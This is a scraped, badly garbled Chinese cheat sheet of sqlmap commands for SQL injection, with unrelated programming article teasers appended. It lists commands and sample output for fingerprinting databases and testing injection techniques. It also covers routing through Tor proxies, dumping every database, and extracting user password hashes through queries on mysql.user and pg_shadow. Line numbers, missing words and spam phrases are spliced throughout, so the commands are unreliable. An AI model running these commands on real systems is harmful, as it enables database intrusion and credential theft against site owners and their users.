注入常用语句-Mysql Tutorial-php.cn

Home

Database

Mysql Tutorial

注入常用语句

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 05:44 PM

Commonly usedinjectionstatement

注入常用语句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 这个东西，是mickey整理的，不多说了，尊重一下原作者，转载注明mickey整理就好了 21 22 更新 23

注入常用语句

T users sinp> 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissett nameisnull bunny ming 这个东西，是mickey整理的，不多说了，香港服务器，尊重一下原作者，转载注明mickey整理就好了 21 22 更新 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev m=1″ -v 1 –sql-shell //执行SQL语句 m更详细的信息 options from a configuration INI file 30 sqlmap -c sqlmap.conf 31 32 使用POST方法提交 sqlmap/oracle/post_int.php” –method POST –data “id=1″ 使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies sqlmap使用referer欺骗 sqlmap使用自定义user-agent,或者使用随机使用自带的user-agents.txt sqlmapagent “Mozillapython sqlmap.py sqlmapa “.agents.txt” 46 47 使用基本认证 sqlmap使用Digest认证 sqlmap使用代理,配合TOR sqlmap.1.47:3128″ sqlmap.1.47:8118″ 56 57 使用多线程猜解 sqlmap–threads 绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入 sqlmapp “id sqlmapcatp “cat,id” sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)” 64 65 指定数据库,绕过SQLMAP的自动检测 sqlmap/pgsql/get_int.php?id=1″ -v 2 –dbms “PostgreSQL” MySQL 69 * Oracle 70 * PostgreSQL 71 * Microsoft SQL Server 72 73 指定操作系统,绕过SQLMAP自动检测 sqlmap/pgsql/get_int.php?id=1″ -v 2 –os “Windows” Linux 77 * Windows 78 79 自定义payload 80 Options: –prefix and –postfix circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix. users . “‘) LIMIT 0, 1″;: .″ test” 87 88 [...] 89 [hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis 90 [hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’ 91 [hh:mm:16] [TRAFFIC OUT] HTTP request: 92 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20 93 %28%27test%27=%27test HTTP/1.1 94 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 95 Host: 192.168.1.121:80 96 Accept-language: en-us,en;q=0.5 97 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, 98 image/png,*/*;q=0.5 99 User-agent: sqlmap/0.7rc1 () 100 Connection: close 101 [...] 102 [hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable 103 [...] 104 105 As you can see, the injection payload for testing for custom injection is: 106 107 id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test 108 109 which URL decoded is: test makes the query syntatically correct to the page query: users (‘test’='test’) LIMIT 0, 1 116 117 In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it. 118 119 页面比较 120 python sqlmap.py -u “?id=1″ –string “luther” -v 1 121 python sqlmap.py -u “?id=1″ –regexp “

lu[\w][\w]er” -v 122 123 排除网站的内容 124 python sqlmap.py -u “?id=1″ –excl-reg “Dynamic content: ([\d]+)” 125 126 多语句测试，php内嵌函数mysql_query(),不支持多语句 127 python sqlmap.py -u “?id=1″ –stacked-test -v 1 128 129 union注入测试 130 python sqlmap.py -u “?id=1″ –union-test -v 1 131 132 unionz注入配合orderby 133 python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1 134 135 python sqlmap.py -u “?id=1″ -v 1 –union-use –banner 136 python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user 137 python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs 138 139 fingerprint 140 python sqlmap.py -u “?id=1″ -v 1 -f 141 python sqlmap.py -u “?name=luther” -v 1 -f -b 142 143 判断当前用户是否是dba 144 python sqlmap.py -u “?id=1″ –is-dba -v 1 145 146 列举数据库用户 147 python sqlmap.py -u “?id=1″ –users -v 0 148 149 列举数据库用户密码 150 python sqlmap.py -u “?id=1″ –passwords -v 0 151 python sqlmap.py -u “?id=1″ –passwords -U sa -v 0 152 153 查看用户权限 154 python sqlmap.py -u “?id=1″ –privileges -v 0 155 python sqlmap.py -u “?id=1″ –privileges -U postgres -v 0 156 157 列数据库 158 python sqlmap.py -u “?id=1″ –dbs -v 0 159 160 列出指定数据库指定表的列名 161 python sqlmap.py -u “?id=1″ –columns -T users -D test -v 1 162 163 列出指定数据库的指定表的指定列的内容 164 python sqlmap.py -u “?id=1″ –dump -T users -D master -C surname -v 0 165 166 指定列的范围从2－4 167 python sqlmap.py -u “?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0 168 169 导出所有数据库，所有表的内容 170 python sqlmap.py -u “?id=1″ –dump-all -v 0 171 172 只列出用户自己新建的数据库和表的内容 173 python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0 174 175 sql query 176 python sqlmap.py -u “?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0 177 python sqlmap.py -u “?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1 178 179 SELECT usename, passwd FROM pg_shadow ORDER BY usename 180 181 保存和恢复会话 182 python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log” 183 184 保存选项到INC配置文件 185 python sqlmap.py -u “?id=1″ -b -v 1 –save ===================================================== 2、sqlmap -g "关键词“ //这是通过google搜索注入，现在还不可以，不知道是什么原因，网站空间，可以直接修改为百度 194 3、 195 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds 199 [hh:mm:26] [INFO] url is stable id' is dynamic id' is dynamic id' is dynamic id' 204 [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET idid' is numeric/unescaped injectable 209 [hh:mm:26] [INFO] testing MySQL ) 211 [hh:mm:26] [INFO] retrieved: 55 212 [hh:mm:26] [INFO] performed 20 queries in 0 seconds 213 [hh:mm:26] [INFO] confirming MySQL ) 215 [hh:mm:26] [INFO] retrieved: 1 216 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 217 [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 218 0, 1 219 [hh:mm:26] [INFO] retrieved: 5 220 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 221 remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 228 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds 232 [hh:mm:18] [INFO] url is stable id' 234 [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter [hh:mm:18] [INFO] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 246 1 -p "cat,id" 5、指定方法和post的数据 250 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- 251 data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 255 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie 256 "COOKIE_VALUE" 7、通过代理注入 260 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy 261 "http://127.0.0.1:8118" 262 8、指定关键词，香港服务器，也可以不指定。程序会根据返回结果的hash自动判断 263 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string 264 "STRING_ON_TRUE_PAGE" 265 9、指定数据，这样就不用猜测其他的数据库里。可以提高效率。 266 --remote-dbms 267 10、指纹判别数据库类型 268 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 269 11、获取banner信息 270 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b .

posted on

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

学习canvas框架详解常用的canvas框架Jan 17, 2024 am 11:03 AM

探索Canvas框架：了解常用的Canvas框架有哪些，需要具体代码示例引言：Canvas是HTML5中提供的一个绘图API，通过它我们可以实现丰富的图形和动画效果。为了提高绘图的效率和便捷性，许多开发者开发了不同的Canvas框架。本文将介绍一些常用的Canvas框架，并提供具体代码示例，以帮助读者更深入地了解这些框架的使用方法。一、EaselJS框架Ea

Spring注解大揭秘：常用注解解析Dec 30, 2023 am 11:28 AM

Spring是一个开源框架，提供了许多注解来简化和增强Java开发。本文将详细解释常用的Spring注解，并提供具体的代码示例。@Autowired：自动装配@Autowired注解可以用于自动装配Spring容器中的Bean。当我们在需要依赖的地方使用@Autowired注解时，Spring将会在容器中查找匹配的Bean并自动注入。示例代码如下：@Auto

15个常用的币圈逃顶指标技术分析Mar 03, 2025 pm 05:48 PM

十五大比特币逃顶指标深度解析：2025年市场展望本文深入分析了十五个常用的比特币逃顶指标，其中比特币Rhodl比率、USDT活期理财和山寨币季节指数已于2024年触及逃顶区间，引发市场关注。面对潜在风险，投资者该如何应对？让我们逐一解读这些指标，并探讨合理的应对策略。一、关键指标详解AHR999囤币指标:由ahr999创建，辅助比特币定投策略。当前值为1.21，处于观望区间，建议谨慎。链接AHR999逃顶指标:AHR999囤币指标的补充，用于识别市场顶部。当前值为2.48，本周

Oracle数据库常用数据类型介绍Mar 08, 2024 am 09:45 AM

Oracle数据库是一种常用的关系型数据库管理系统，它支持多种数据类型以满足不同的需求。在使用Oracle数据库时，了解数据库的数据类型是非常重要的。本文将介绍Oracle数据库中常用的数据类型，并附带具体的代码示例。一、数值型数据类型NUMBERNUMBER是Oracle数据库中最常用的数值型数据类型，用于存储整数或浮点数。NUMBER数据类型可以指定精度

PHP8.0中的multi-catch语句May 14, 2023 pm 01:51 PM

随着Web应用程序的发展，PHP语言在Web开发中得到了广泛应用。而在PHP8.0版本中，一个新的语言特性被引入——multi-catch语句。什么是multi-catch语句？在先前的PHP版本中，对于多个异常类型的处理，开发人员需要写多个catch语句。例如，如下代码块展示了对两种不同异常的处理：try{//Somecodethatmay

PHP中常用的加密算法有哪些？May 12, 2023 pm 06:51 PM

随着互联网的发展，数据安全已成为我们日常工作中必须关注的严肃问题。针对敏感的个人信息或商业数据，加密变得尤为重要。在PHP开发中，一些加密算法被广泛应用，下面我们就来了解一下PHP中常用的加密算法。一、Base64编码Base64编码常用于在网页传输或邮件中传输二进制数据，因为网页或邮件只能传发送字符串类型数据，不能直接传输二进制数据。Base64就是一种解

Java常用的数据结构有哪些？深入解析Java数据结构Jan 09, 2024 pm 11:29 PM

Java是一种广泛使用的编程语言，在开发过程中，数据结构是不可或缺的一部分。数据结构有助于组织和管理数据，提高程序的执行效率。在Java中，常用的数据结构包括数组、链表、栈、队列、树、图等。本文将深入解析这些常用的Java数据结构，并提供具体的代码示例。一、数组（Array）数组是一种线性数据结构，它可以存储相同类型的元素。在Java中，可以使用以下方式声明

Go语言中常用的函数有哪些？Mar 28, 2024 pm 02:45 PM

Go语言中常用的函数有哪些？————探究Go语言中常用的函数及其用法作为一门流行的静态类型编程语言，Go语言广泛应用于各种领域，如服务器端开发、网络编程、云计算等。在Go语言中，函数作为基本的代码组织单元，是程序运行的重要组成部分。本文将探究Go语言中常用的函数及其用法，帮助读者更好地掌握这门语言的核心特性。一、函数声明与调用函数在Go语言中以关键字"fun

See all articles